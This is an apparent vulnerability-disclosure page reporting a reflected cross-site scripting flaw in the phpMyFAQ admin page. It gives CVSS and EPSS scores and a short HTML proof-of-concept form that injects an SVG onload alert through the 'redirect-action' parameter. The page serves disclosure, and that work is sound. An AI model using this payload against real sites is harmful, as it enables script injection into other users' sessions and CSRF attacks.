Lucene search

K
huntrAggressiveuserEAC0A9D7-9721-4191-BEF3-D43B0DF59C67
HistoryDec 13, 2022 - 10:19 a.m.

Reflect XSS Which can help in any CSRF Vulnerability

2022-12-1310:19:56
aggressiveuser
www.huntr.dev
13

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.0005 Low

EPSS

Percentile

14.3%

Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

Below HTML code for trigger XSS with POST method

<html>
 <title>XSS POC By AggressiveUser</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://roy.demo.phpmyfaq.de/admin/index.php" method="POST">
      <input type="hidden" name="redirect-action" value="AggressiveUser"><svg onload=alert(112233)>" />
      <center>&lt;input type="submit" value="Click Here for Trigger XSS" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

Below BurpSuite POC
POST Method XSS

#YO Maintainer :) Long Time No SEE !

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.0005 Low

EPSS

Percentile

14.3%

Related for EAC0A9D7-9721-4191-BEF3-D43B0DF59C67